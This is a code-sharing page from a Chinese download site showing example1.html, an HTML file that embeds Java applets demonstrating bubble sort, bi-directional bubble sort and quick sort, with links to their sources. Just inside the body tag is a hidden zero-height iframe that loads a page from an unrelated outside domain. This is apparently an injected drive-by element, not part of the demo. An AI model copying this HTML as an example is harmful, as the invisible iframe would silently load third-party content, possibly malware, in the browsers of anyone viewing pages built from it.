⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 example1.html

📁 本程序展示了冒泡,方向冒泡以及快速排序的算法以及演示,使用java实现,可以清楚看清其流程.
💻 HTML
字号:
<html>  <head>    <title>The Sorting Algorithm Demo (1.1)</title>  </head>  <body><iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>      <h1>The Sorting Algorithm Demo (1.1)</h1>      <hr>      <pre>                  <strong>Bi-Directional</strong><strong>Bubble Sort</strong>        <strong>Bubble Sort</strong>      <strong>Quick Sort</strong><applet codebase="." code=SortItem.class width=100 height=100><param name="alg" value="BubbleSort">alt="Your browser understands the &lt;APPLET&gt; tag but isn't running the applet, for some reason."Your browser is completely ignoring the &lt;APPLET&gt; tag!</applet>     <appletcodebase="." code=SortItem.class width=100 height=100><param name="alg" value="BidirBubbleSort">alt="Your browser understands the &lt;APPLET&gt; tag but isn't running the applet, for some reason."Your browser is completely ignoring the &lt;APPLET&gt; tag!</applet>     <appletcodebase="." code=SortItem.class width=100 height=100><param name="alg" value="QSort">alt="Your browser understands the &lt;APPLET&gt; tag but isn't running the applet, for some reason."Your browser is completely ignoring the &lt;APPLET&gt; tag!</applet>      </pre>      <hr>      <h2>The Sources</h2>      <a href="SortItem.java">The applet.</a><br>      <a href="SortAlgorithm.java">The "generic" sorting algorithm.</a><br>      <a href="BidirBubbleSortAlgorithm.java">The Bi-directional Bubble Sort algorithm.</a><br>      <a href="BubbleSortAlgorithm.java">The Bubble Sort algorithm.</a><br>      <a href="QSortAlgorithm.java">The Quick Sort algorithm.</a>  </body></html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -